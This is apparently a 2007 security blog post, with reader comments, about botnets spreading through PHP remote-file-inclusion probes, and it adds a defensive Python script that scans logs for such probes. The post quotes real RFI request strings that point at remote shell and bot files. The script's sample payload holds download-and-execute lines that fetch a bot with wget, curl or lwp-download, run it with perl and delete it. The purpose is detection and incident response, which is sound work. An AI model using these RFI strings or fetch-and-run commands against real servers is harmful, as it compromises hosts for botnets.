Botnets Spreading Via PHP Version all_most_happened_to_me
I know that botnets spreading via vulnerabilities in PHP applications is not news. It is, however, the first time that I have noticed it on my site. So I have been targeted... along with the rest of the planet.
Actually, this is the second time I have noticed this activity on my site. The first time, I was checking the referring pages of incoming connections and saw that one of them pointed to a file named "c.txt" on another web server. The actual link was: archives/category/components/com_smf/smf.php?mosConfig_absolute_path=http://www.depdiknas.go.id/c.txt?. I immediately recognized it as a remote file inclusion (RFI) attempt against the smf.php component: mosConfig_absolute_path is supposed to hold a local path, so if the script passes it to an include without checking it, and the PHP build allows URL includes (allow_url_fopen, and on PHP 5.2 and later allow_url_include), the server fetches c.txt from the remote host and runs it as PHP. The trailing "?" turns anything the script appends to the path into a query string on the attacker's URL, so the include still resolves. I searched my web server for the file; as the search did not turn anything up, and I was extremely busy at the time, I just drove on and didn't worry about it. Until today, that is, when I noticed the link again.
Twice was enough for me. I started looking into what was happening by following the links, downloading the text files, and analyzing them in Notepad++. During this research, however, I noticed that "B10[m|g]", the author of "Yet another non-informative, useless blog", had already done this for me in his post The MUIE Botnet. In fact, he went the extra step I would have avoided by connecting to the botnet's IRC channel and confronting the botnet "masters" (as they probably want to be called). I think B10[m|g] found a better name for them. Good work, B10[m|g], and thank you for disclosing this to the public. You are definitely going forth and doing good things.
Some things that I did find interesting and that B10[m|g] didn't mention (probably because he is more used to seeing this type of behavior in botnet deployment programs):
- The "c.txt" file attempts to download, execute, and remove two other files. Not so unusual, except that it tries 29 different commands to do it. To execute the commands it uses the PHP calls system, passthru, popen, proc_open, and "roc_open" (sic, as it appears in the script). Each of these calls in turn attempts the download with each of the following programs: wget, "curl -O", lwp-download, "lynx -source", fetch, and GET. The redundancy is the point: the script only needs one execution function that the administrator has not listed in disable_functions and one downloader installed on the box.
- Some of the strings in the bot code stand out (you could grep for these to determine whether the file is on your system): "VulnScan v2", "Norman ownz your box", nasa.gov, "Shellbot RFI by Source v1.4", "TCP DDoSing", "w0rmb0t ver", "Encontramos-una-ip" (Spanish for "We found an IP"), "MORGAN OWNED YOUR BOX", "Pagina-Vulnerable" (Spanish for "Vulnerable page"), "tcpflooder", "udpflooder", "www.google.com.br/search?hl=pt-BR&q=" (which suggests it uses Google searches to find new targets), and (as B10[m|g] stated) "# NOTE: DONT REMOVE COPYRIGHTS".
What is the moral of this story? First, in the Wild West of the Internet, the administrators of any system or application must monitor their logs for anomalous activity. If something looks out of the ordinary, it needs to be investigated to determine what is actually happening. Once the information about the activity has been gathered, a risk analysis of the assets involved needs to be performed to decide whether any additional action is necessary. Questions that should not be overlooked during this assessment: did an infection happen, and if so, how; is any sensitive information involved; and could other systems on the same network segment be affected as well. Then action needs to be taken to fix the problem and get the asset back up and running so that it can perform its function.
All of that said, I am glad that I am not vulnerable to exploitation via this avenue. I can only hope that continuing to watch the logs this way will help protect me in the future by allowing me to catch this type of malicious activity in the act.
UPDATE: Of course, as soon as I published this I noticed this in my logs: components/com_smf/smf.php?mosConfig_absolute_path=http://www.dariustech.com/templates/cmd.txt?&list=1&cmd=id. The extra cmd=id parameter shows that cmd.txt is a web shell that takes its command from the query string; id is the usual first probe, since it tells the attacker which account the web server runs as.
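As an added example (not code from the original post, nor from B10[m|g]), here is a small Python script that covers both the c.txt analysis above and the log-monitoring advice: it picks RFI probes like the two request strings in this post out of Apache combined-format access logs (request URI and Referer), extracts the remote URL and any web-shell command parameter, and triages a fetched script against the indicator strings and the exec-function/downloader combination described above. The log lines, the sample payload, the function names, and the extra exec/shell_exec entries are assumptions constructed for this example.

```python
"""Flag PHP remote-file-inclusion (RFI) probes in web server logs and triage
the fetched script.  Added example; not code from the original post.
Assumptions (constructed for this example): Apache 'combined' log format,
the sample log lines and sample payload below, and the hypothetical
function names.  The indicator strings are the ones quoted in the post."""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache combined format (assumed); only the fields we use are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# A query parameter whose value is a remote URL is the RFI signature.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# Parameters a dropped web shell commonly reads its command from (cmd=id in the post).
SHELL_PARAMS = {"cmd", "c", "command"}

# Strings the post quotes from the bot scripts.
INDICATORS = [
    "VulnScan v2", "Norman ownz your box", "Shellbot RFI by Source v1.4",
    "TCP DDoSing", "w0rmb0t ver", "Encontramos-una-ip", "MORGAN OWNED YOUR BOX",
    "Pagina-Vulnerable", "tcpflooder", "udpflooder",
    "# NOTE: DONT REMOVE COPYRIGHTS",
]
# Execution functions the post lists, plus exec/shell_exec (added here as the
# other common PHP command-execution functions), and the downloaders it lists.
EXEC_FUNCS = ["system", "passthru", "popen", "proc_open", "exec", "shell_exec"]
DOWNLOADERS = ["wget", "curl", "lwp-download", "lynx", "fetch", "GET"]


def find_rfi(url):
    """Return details of a remote include carried by `url`, or None.

    Works on a request path ("/x.php?p=http://...") or a full referer URL.
    parse_qsl percent-decodes values, so http%3A%2F%2F is caught too.
    """
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    remote = [(k, v) for k, v in params if REMOTE_SCHEME_RE.match(v)]
    if not remote:
        return None
    param, payload = remote[0]
    cmd = next((v for k, v in params if k.lower() in SHELL_PARAMS), None)
    # The trailing "?" is the attacker's trick: anything the vulnerable script
    # appends to the path becomes a query string on *their* URL, so the
    # include still resolves.  Strip it to get the URL to fetch for analysis.
    return {"param": param, "payload": payload.rstrip("?"), "cmd": cmd}


def scan_log(log_text):
    """Return one hit per RFI attempt seen in the request URI or the Referer."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for field in ("uri", "referer"):
            rfi = find_rfi(m.group(field))
            if rfi:
                hits.append({"ip": m.group("ip"), "field": field,
                             "status": int(m.group("status")), **rfi})
    return hits


def scan_payload(text):
    """Triage a fetched script: known strings, exec functions, downloaders."""
    found = {
        "indicators": [s for s in INDICATORS if s in text],
        "exec_funcs": [f for f in EXEC_FUNCS
                       if re.search(r'\b' + re.escape(f) + r'\s*\(', text)],
        "downloaders": [d for d in DOWNLOADERS
                        if re.search(r'(?<![\w-])' + re.escape(d) + r'(?![\w-])', text)],
    }
    # A known string, or an exec function wired to a downloader: the
    # download-execute-remove pattern the post describes.
    found["malicious"] = bool(found["indicators"]) or (
        bool(found["exec_funcs"]) and bool(found["downloaders"]))
    return found


# Constructed sample log: the two request strings from the post plus a benign hit.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jan/2007:10:02:11 -0500] "GET /archives/category/components/com_smf/smf.php?mosConfig_absolute_path=http://www.depdiknas.go.id/c.txt? HTTP/1.1" 404 1234 "-" "libwww-perl/5.805"
203.0.113.9 - - [12/Jan/2007:11:15:42 -0500] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.dariustech.com/templates/cmd.txt?&list=1&cmd=id HTTP/1.1" 404 1234 "-" "Mozilla/4.0"
198.51.100.4 - - [12/Jan/2007:11:20:03 -0500] "GET /2007/01/botnets.html HTTP/1.1" 200 8345 "http://www.google.com/search?q=smf.php+rfi" "Mozilla/5.0"
"""

# Constructed sample payload mimicking the c.txt pattern (not the real file).
SAMPLE_PAYLOAD = """<?php
# NOTE: DONT REMOVE COPYRIGHTS
# Shellbot RFI by Source v1.4
system("cd /tmp;wget http://198.51.100.23/bot.txt;perl bot.txt;rm -f bot.txt");
passthru("cd /tmp;curl -O http://198.51.100.23/bot.txt;perl bot.txt;rm -f bot.txt");
popen("cd /tmp;lwp-download http://198.51.100.23/bot.txt;perl bot.txt;rm -f bot.txt", "r");
?>
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['field']}: {hit['param']} -> {hit['payload']} cmd={hit['cmd']}")
    print(scan_payload(SAMPLE_PAYLOAD))
```

A 404 on these hits means the same thing it meant for this site: the component is not installed, so the probe went nowhere. The same hits against a host that does have com_smf are the cue to fetch the payload from an isolated machine and run scan_payload on it, and to check the other boxes on the segment for the strings, as the post recommends.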
Go forth and do good things,
Cutaway
botnet, B10[m|g], smf.php, c.txt, PHP, Security Ripcord
Help support my training and travel to security conferences. Get your SANS Training and GIAC Certifications through the Security Ripcord.
January 12th, 2007 at 1:24 pm
Thanks for linking to my post (I found the referer to this site in my logs hehe). Anyways, your dariustech.com entry I did not get (yet). I’ve received some others and up to now I’ve been able to minimize their risk by complaining to the ISPs. Also I try to look up infected boxes in the IRC channels and warn the owners of those machines. That resulted (in this specific case) in currently only 1 infected machine in #muie (ok, multiple processes, but still but 1 machine). Woohoo.
As to confronting the “masters” … don’t sweat it. They are script kiddies, you can see it by the amateur approach. And hey, it’s to confront them
Will look into your dariustech.com entry too.
Remember, botnets are mainly responsible for spam, so stopping them is key!
January 12th, 2007 at 1:29 pm
Guess the dariustech host isn’t a big problem anymore:
$ HEAD 'http://www.dariustech.com/templates/cmd.txt?&list=1&cmd=id'
404 Not Found
Connection: close
Date: Fri, 12 Jan 2007 13:28:08 GMT
Accept-Ranges: bytes
ETag: "1410009-3c0-cf48f280"
Server: Apache/2.0.52 (CentOS)
Content-Length: 960
Content-Type: text/html
Last-Modified: Tue, 22 Mar 2005 20:37:14 GMT
Client-Date: Fri, 12 Jan 2007 13:29:24 GMT
Client-Peer: 12.180.48.93:80
Client-Response-Num: 1
X-Pad: avoid browser bug
January 24th, 2007 at 1:29 am
Hey,
These little punks decided try to use my site for spam…thanks for reporting it to my ISP, it helped me quickly put a stop to them….
I found that it was a module from mambo that they were using to remotely upload this file, so I quickly deleted that module..
Again thanks,
DTI webmaster – http://www.dariustech.com
January 28th, 2007 at 6:48 am
[...] As I stated in a previous post, I have been paying a little more attention to the information provided in the URI and Referer sections provided by one of my WordPress plugins. This information has, at times, contained information about some systems on the Internet that are searching for other systems with vulnerable PHP installations and applications. As I mentioned in the original post, I found a blog where another blogger had already analyzed the scripts that I found on a hacked server, which was scanning my web server. The blog is B10[m|g] and the blogger goes by the pseudonym B10m. [...]
January 29th, 2007 at 7:41 am
[...] Next I started to look into the file that it is pointing to for the code execution. Recently I have been plagued by some attacks whose intent was to run some simple download commands which, in turn, would start up a Perl IRC bot. Imagine how surprised I was to be greeted with the contents of a file ("cmd.do") which appears to be some type of HTML/PHP based IRC (?) bot. As I began to scan this file I began to like it even less. I am not a big-time PHP programmer, but I could tell that this script was taking the input from the incoming URLs and creating directories and files, manipulating their paths based on OS type, uploading files, deleting files (such as DLLs) and directories, creating Administrator accounts (holy crap), and running commands. This may or may not have been a cut-and-paste hack job, but I very much do not like the implications of any of these actions. Even if everything is running as the user (non-root) who initiated the web server, I don't like the implications of this in the least. [...]